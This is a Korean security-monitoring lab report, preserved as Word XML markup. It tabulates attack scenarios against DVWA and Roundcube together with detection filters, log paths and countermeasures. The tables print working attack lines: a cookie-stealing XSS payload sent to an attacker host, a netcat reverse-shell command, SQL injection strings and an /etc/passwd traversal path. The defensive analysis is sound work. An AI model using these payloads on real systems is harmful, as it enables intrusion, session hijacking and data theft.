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p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footnotePr>
        <w:numFmt w:val="lowerRoman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134" w:right="1134" w:bottom="1134" w:left="1134" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="0"/>
    </w:sectPr>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.2. 관제 수행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관제 수행은 네트워크 패킷 분석(Wireshark)과 서버 로그(syslog/apache/roundcube) 분석을 병행하여 정상/비정상 행위의 판별 기준을 정의하고, 시나리오2 기반(고객정보 탈취) 공격 수행 시 생성되는 흔적을 식별·분류하는 방식으로 진행하였다.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5.2-1. 시나리오2 상세( DNS 정보 수집(dnsenum))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공개 도메인 기반 DNS 정보 수집(서브도메인/Zone 정보 노출 여부 확인)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패킷+syslog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dns.qry.type == 252(AXFR)</w:t>
              <w:br/>
              <w:t>syslog: AXFR started/ended, transfer of "domain/IN"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dnsenum/dig 기반 AXFR 시도 트래픽 및 네임서버 로그(AXFR started)와 다수 레코드 전송(예: 12 records) 확인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 allow-transfer 제한 + TCP 53 접근통제(Secondary DNS만 허용) + 네트워크 ACL 적용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dnsenum --unump wj.com</w:t>
              <w:br/>
              <w:t>(또는) dig axfr wj.com @&lt;DNS_IP&gt;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/var/log/syslog (또는 named/bind 로그)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[DNS 설정]</w:t>
              <w:br/>
              <w:t>allow-transfer { &lt;SECONDARY_DNS_IP&gt;; };</w:t>
              <w:br/>
              <w:br/>
              <w:t>[네트워크]</w:t>
              <w:br/>
              <w:t>TCP 53: Secondary DNS만 허용, 그 외 차단(UFW/iptables/ACL)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5.2-1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5.2-2. 시나리오2 상세( 서비스 스캔(Nmap))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2"/>
        <w:gridCol w:w="7026"/>
      </w:tblGrid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스텔스 SYN 스캔 및 서비스/버전 식별(정찰)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tcp.flags.syn == 1</w:t>
              <w:br/>
              <w:t>로그: User-Agent에 Nmap Scripting Engine, 대량 404, 동일 시각 다수 요청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nmap -sS -sV 수행 시 단시간 다수 SYN 및 웹 로그의 비정상 경로/UA 패턴 확인(취약 서버 후보 식별)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스캔 발생 IP/대역 차단(ACL) 및 율제한(iptables recent) + 서비스 노출 최소화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nmap -sS -sV -p80,443 172.16.18.0/16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[iptables 예시]</w:t>
              <w:br/>
              <w:t>iptables -A INPUT -p tcp --syn --dport 80 -m recent --name WEBSCAN --set</w:t>
              <w:br/>
              <w:t>iptables -A INPUT -p tcp --syn --dport 80 -m recent --name WEBSCAN --update --seconds 10 --hitcount 50 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2612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702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5.2-2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5.2-3. 시나리오2 상세( Reflected XSS(쿠키 탈취))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Reflected XSS(쿠키 탈취)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URI 파라미터에 스크립트 삽입 후 피해자 브라우저에서 실행(세션 쿠키 외부 전송)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URI 내 인코딩된 &lt;script&gt; 또는 특징적 페이로드 포함 여부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xss_d 파라미터에 스크립트 포함 URL 생성 및 클릭 유도 후 쿠키가 공격자 서버로 전송되는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입력값 검증/출력 인코딩 + CSP 적용 + 쿠키 HttpOnly/SameSite 설정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.../vulnerabilities/xss_d/?default=&lt;script&gt;document.location='http://&lt;ATTACKER&gt;/cookie?'+document.cookie&lt;/script&gt;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 애플리케이션 차원 조치가 필수이며, WAF/필터링만으로는 우회 가능.</w:t>
              <w:br/>
              <w:t>- 출력 인코딩(HTML escape)</w:t>
              <w:br/>
              <w:t>- CSP: script-src 제한</w:t>
              <w:br/>
              <w:t>- 세션 쿠키: HttpOnly, Secure, SameSite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5.2-3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5.2-4. 시나리오2 상세( Mail Brute Force(Roundcube))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Mail Brute Force(Roundcube)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웹메일 로그인 반복 시도(자동화/사전 기반)로 계정 탈취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패킷+roundcube 로그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http.request.method == "POST"</w:t>
              <w:br/>
              <w:t>로그: Login failed/IMAP Error 반복, 특정 IP 단시간 연속 시도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Burp Intruder 기반 대량 로그인 실패(401) 후 성공(200) 패턴 및 errors.log의 Login failed 반복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계정 잠금/레이트리밋/2FA·CAPTCHA 적용 + fail2ban 연계 + 네트워크 ACL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Burp Suite Intruder(웹메일 로그인 POST)</w:t>
              <w:br/>
              <w:t>(대체) 사전 기반 비밀번호 대입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/var/log/roundcubemail/errors.log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동일 IP 반복 실패 시 자동 차단(fail2ban) 및 관리자 계정 보호(2FA/강력 PW/계정 잠금)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5.2-4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5.2-5. 시나리오2 상세( SQL Injection(고객정보 탈취))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시나리오2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SQL Injection(고객정보 탈취)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' or '1'='1' 및 UNION SELECT 등으로 DB 스키마/데이터 추출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쿼리스트링에 %27(or), %23(#) 등 인코딩된 제어문자·예약어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회원조회 입력값에 페이로드 전달 시 응답 크기 증가 및 vulnerabilities/sqli/ 경로로 반복 요청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WAF 연계 + 파라미터 바인딩/ORM 사용 + 입력검증 + DB 최소권한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' or '1'='1' #</w:t>
              <w:br/>
              <w:t>UNION SELECT ... FROM information_schema...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애플리케이션 취약점 조치가 핵심(Prepared Statement).</w:t>
              <w:br/>
              <w:t>추가로 IDS/WAF 룰(OR 1=1, UNION SELECT 등) 적용 및 로그 상관분석.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시나리오2를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5.2-5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55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.3. 관제 수행 결과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/>
        <w:t>관제 수행은 클라이언트 단(프록시 설정 변조) 이상 징후와 웹 서버 로그를 함께 분석하여 시나리오3 기반(사회공학→MitM→세션 탈취→웹 취약점 악용) 공격 흐름에서 생성되는 패킷/로그 흔적을 식별·분류하고, 차단·대응 방안을 결과 중심으로 정리하였다.</w:t>
      </w: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5.3-1. 시나리오3 상세( 악성 쉘 실행(프록시 강제 변경))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악성 쉘 실행(프록시 강제 변경)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사회공학으로 .sh 실행 유도 후 프록시 설정을 공격자 서버로 강제 변경(MitM 환경 구성)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syslog+패킷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syslog: Proxy set to [IP:포트], 비정상 프로세스(예: nautilus-autostart.desktop)</w:t>
              <w:br/>
              <w:t>패킷: 트래픽이 공격자 프록시를 경유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의심 파일 실행 직후 프록시 설정 변조 로그 발생 및 사용자 트래픽이 공격자(Kali/Burp)로 우회되는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프록시 설정 변경 모니터링/통제 + 실행 파일 차단(화이트리스트) + 사용자 보안 인식 교육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bash OO대학_족보_모음.sh (예시)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/var/log/syslog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감염 의심 시 프록시 초기화 및 자동시작 항목 제거, 엔드포인트 정책(스크립트 실행 제한)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5.3-1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5.3-2. 시나리오3 상세( CSRF(비밀번호 강제 변경))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CSRF(비밀번호 강제 변경)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탈취한 세션 쿠키를 이용해 사용자의 의도와 무관한 비밀번호 변경 요청 수행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http.referer</w:t>
              <w:br/>
              <w:t>로그: User-Agent=python-requests, GET URL에 password_new 파라미터 노출, 취약 경로 접근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자동화 스크립트(python3 csrf.py) 요청 흔적 및 password_new 값이 로그에 기록되는 비정상 패턴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CSRF 토큰 + SameSite 쿠키 + 민감 기능 재인증 + POST 전환/Origin 검증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python3 csrf.py (requests 기반)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애플리케이션 조치가 핵심. GET 기반 비밀번호 변경 금지 및 CSRF 토큰 검증 강제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5.3-2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5.3-3. 시나리오3 상세( File Inclusion(LFI))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Inclusion(LFI)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URL 파라미터 경로 조작(../)로 시스템 파일(/etc/passwd 등) 열람 시도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Wireshark: http.request.uri</w:t>
              <w:br/>
              <w:t>page=../../.. 형태 및 /etc/passwd, /etc/shadow 등 경로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DVWA File Inclusion 메뉴에서 /etc/passwd 접근 성공, /etc/shadow 접근 실패 패턴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입력값 화이트리스트/경로 정규화 + include 기능 제거/패치 + WAF 룰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page=../../../../../etc/passwd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 루트 외부 파일 접근 차단(allowlist), 에러/탐지 로그 상관분석으로 반복 공격 차단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5.3-3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5.3-4. 시나리오3 상세( File Upload(업로드 취약점))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Upload(업로드 취약점)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기능을 악용하여 서버에 파일 저장(웹 루트/경로 노출) 후 후속 공격 기반 확보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로그: POST /vulnerabilities/upload/ 요청 및 200 OK, multipart/form-data 업로드 흔적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성공 후 파일 위치가 응답으로 안내되는 패턴 확인(취약 경로 식별)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확장자/Content-Type 검증 + 업로드 디렉터리 실행 금지 + 웹 루트 외부 저장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File Upload 페이지에서 파일 업로드(POST)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파일 AV 스캔/무결성 점검, 업로드 경로에 PHP 실행 금지(웹서버 설정)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5.3-4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5.3-5. 시나리오3 상세( Web Shell(원격 명령 실행))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Web Shell(원격 명령 실행)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경로에 웹쉘(backdoor.php 등) 배치 후 cmd 파라미터로 시스템 명령 실행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로그: /hackable/uploads/*.php 호출 + cmd= 파라미터, nc/shell_exec(/bin/sh) 문자열 포함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폴더 내 PHP 호출 및 cmd=ls 등 명령어 전달 흔적(백도어 생성/실행)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업로드 경로 스크립트 실행 금지 + 웹쉘 탐지(IOC) + 파일 무결성 모니터링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command.php?cmd=ls</w:t>
              <w:br/>
              <w:t>(예시) backdoor.php 생성/호출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웹서버 설정으로 uploads 디렉터리의 PHP 실행 차단 + WAF 룰(cmd=, shell_exec 등) 적용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5.3-5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표 5.3-6. 시나리오3 상세( Reverse Shell(Netcat))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5"/>
        <w:gridCol w:w="6913"/>
      </w:tblGrid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항목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>
                <w:b/>
              </w:rPr>
              <w:t>내용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시나리오3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Reverse Shell(Netcat)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 기법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웹쉘을 통해 서버가 공격자 포트로 역접속(nc -e /bin/sh)하여 쉘 획득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관제 데이터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패킷+apache access.log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식별 기준(필터/키워드)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패킷: 서버→공격자 IP:PORT 아웃바운드 연결</w:t>
              <w:br/>
              <w:t>로그: uploads/backdoor.php 호출, 타임아웃(504) 등 비정상 코드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관측 결과(요약)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공격자 nc -lvp 포트 대기 후 backdoor.php 실행 시 역접속으로 터미널 제어권 획득 흐름 확인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대응/후속 조치(요약)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Egress 차단(서버 아웃바운드 제어) + 비인가 포트/프로세스 탐지 + 웹쉘 제거/패치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공격/검증 명령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공격자: nc -lvp 8888</w:t>
              <w:br/>
              <w:t>서버(웹쉘): nc &lt;ATTACKER_IP&gt; 8888 -e /bin/sh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핵심 로그 경로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/var/log/apache2/dvwa_access_log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차단/대응(상세)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방화벽 egress 정책으로 불필요한 아웃바운드 차단(예: 8888/tcp) 및 IDS 룰 연계</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="2" w:space="0"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>검증 방법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6913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>
              <w:t>정책 적용 전/후 동일 시나리오3을 재현하여 탐지/차단 여부를 확인</w:t>
            </w:r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  <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.3-6</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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8"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="9305"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
        <w:pBdr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</w:pBdr>
      </w:pPr>
    </w:p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4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48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4">
    <w:multiLevelType w:val="multilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pStyle w:val="54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5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pStyle w:val="55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6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pStyle w:val="56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7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pStyle w:val="57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8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pStyle w:val="58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59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pStyle w:val="59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0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0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1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1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abstractNum w:abstractNumId="262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pStyle w:val="62"/>
      <w:rPr>
        <w:rFonts w:ascii="한컴바탕" w:hAnsi="한컴바탕" w:eastAsia="한컴바탕"/>
        <w:color w:val="000000"/>
        <w:sz w:val="2"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7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  <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="248">
    <w:abstractNumId w:val="248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72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1">
    <w:name w:val="Body Text"/>
    <w:uiPriority w:val="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">
    <w:name w:val="Body Text 2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48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">
    <w:name w:val="Body Text 2 Char"/>
    <w:uiPriority w:val="3"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="Body Text 3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16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="5">
    <w:name w:val="Body Text 3 Char"/>
    <w:uiPriority w:val="5"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="6">
    <w:name w:val="Body Text Char"/>
    <w:uiPriority w:val="6"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="7">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="7"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:spacing w:val="4"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="8">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="8"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Footer Char"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Header Char"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Heading 1 Char"/>
    <w:uiPriority w:val="12"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="376092"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="Heading 2 Char"/>
    <w:uiPriority w:val="13"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="Heading 3 Char"/>
    <w:uiPriority w:val="14"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="Heading 4 Char"/>
    <w:uiPriority w:val="15"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Heading 5 Char"/>
    <w:uiPriority w:val="16"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="244061"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Heading 6 Char"/>
    <w:uiPriority w:val="17"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="244061"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="Heading 7 Char"/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="19">
    <w:name w:val="Heading 8 Char"/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="20">
    <w:name w:val="Heading 9 Char"/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="21">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="Intense Quote"/>
    <w:uiPriority w:val="22"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:pBdr>
        <w:top w:val="none" w:color="000000" w:sz="2" w:space="1"/>
        <w:left w:val="none" w:color="000000" w:sz="2" w:space="4"/>
        <w:bottom w:val="single" w:color="4f81bd" w:sz="3" w:space="4"/>
        <w:right w:val="none" w:color="000000" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:wordWrap w:val="1"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid/>
      <w:spacing w:before="200" w:after="280" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="936" w:right="936" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="Intense Quote Char"/>
    <w:uiPriority w:val="23"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="24">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="24"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="c0504d"/>
      <w:spacing w:val="4"/>
      <w:sz w:val="22"/>
      <w:u w:val="single" w:color="c0504d"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="List"/>
    <w:uiPriority w:val="2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36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6">
    <w:name w:val="List 2"/>
    <w:uiPriority w:val="2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7">
    <w:name w:val="List 3"/>
    <w:uiPriority w:val="2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1080" w:right="0" w:hanging="36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8">
    <w:name w:val="List Bullet"/>
    <w:uiPriority w:val="2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29">
    <w:name w:val="List Bullet 2"/>
    <w:uiPriority w:val="2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0">
    <w:name w:val="List Bullet 3"/>
    <w:uiPriority w:val="3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1">
    <w:name w:val="List Continue"/>
    <w:uiPriority w:val="3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36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2">
    <w:name w:val="List Continue 2"/>
    <w:uiPriority w:val="3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3">
    <w:name w:val="List Continue 3"/>
    <w:uiPriority w:val="3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120" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="108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4">
    <w:name w:val="List Number"/>
    <w:uiPriority w:val="3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5">
    <w:name w:val="List Number 2"/>
    <w:uiPriority w:val="35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6">
    <w:name w:val="List Number 3"/>
    <w:uiPriority w:val="36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37">
    <w:name w:val="List Paragraph"/>
    <w:uiPriority w:val="37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72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character" w:styleId="38">
    <w:name w:val="Macro Text Char"/>
    <w:uiPriority w:val="38"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="39">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="39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0">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="4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  <w:style w:type="paragraph" w:styleId="41">
    <w:name w:val="Quote"/>
    <w:uiPriority w:val="4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맑은 고딕" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="42">
    <w:name w:val="Quote Char"/>
    <w:uiPriority w:val="42"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="43">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="43"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="44">
    <w:name w:val="Subtitle"/>
    <w:uiPriority w:val="4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libri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:spacing w:val="14"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="45">
    <w:name w:val="Subtitle Char"/>
    <w:uiPriority w:val="45"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:spacing w:val="14"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="46">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="46"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="7f7f7f"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="47">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="47"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="맑은 고딕"/>
      <w:color w:val="c0504d"/>
      <w:sz w:val="22"/>
      <w:u w:val="single" w:color="c0504d"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="48">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="4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6"/>
      <w:numPr>
        <w:numId w:val="248"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="376092"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="49">
    <w:name w:val="Title"/>
    <w:uiPriority w:val="49"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:pBdr>
        <w:top w:val="none" w:color="000000" w:sz="2" w:space="1"/>
        <w:left w:val="none" w:color="000000" w:sz="2" w:space="4"/>
        <w:bottom w:val="single" w:color="4f81bd" w:sz="7" w:space="4"/>
        <w:right w:val="none" w:color="000000" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:wordWrap w:val="1"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid/>
      <w:spacing w:before="0" w:after="300" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="17375e"/>
      <w:kern w:val="1"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="50">
    <w:name w:val="Title Char"/>
    <w:uiPriority w:val="50"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="17375e"/>
      <w:kern w:val="1"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="51">
    <w:name w:val="caption"/>
    <w:uiPriority w:val="51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40" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="footer"/>
    <w:uiPriority w:val="5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3">
    <w:name w:val="header"/>
    <w:uiPriority w:val="5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center" w:leader="none" w:pos="4680"/>
        <w:tab w:val="right" w:leader="none" w:pos="9360"/>
      </w:tabs>
      <w:wordWrap w:val="1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맑은 고딕" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="54">
    <w:name w:val="heading 1"/>
    <w:uiPriority w:val="54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480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
      <w:numPr>
        <w:numId w:val="254"/>
        <w:ilvl w:val="0"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="376092"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="55">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="55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1"/>
      <w:numPr>
        <w:numId w:val="255"/>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="56">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="56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2"/>
      <w:numPr>
        <w:numId w:val="256"/>
        <w:ilvl w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="57">
    <w:name w:val="heading 4"/>
    <w:uiPriority w:val="57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3"/>
      <w:numPr>
        <w:numId w:val="257"/>
        <w:ilvl w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="58">
    <w:name w:val="heading 5"/>
    <w:uiPriority w:val="58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4"/>
